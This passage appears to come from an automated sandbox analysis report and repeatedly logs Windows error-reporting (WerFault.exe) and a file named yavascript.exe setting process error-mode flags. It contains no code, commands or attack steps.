Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
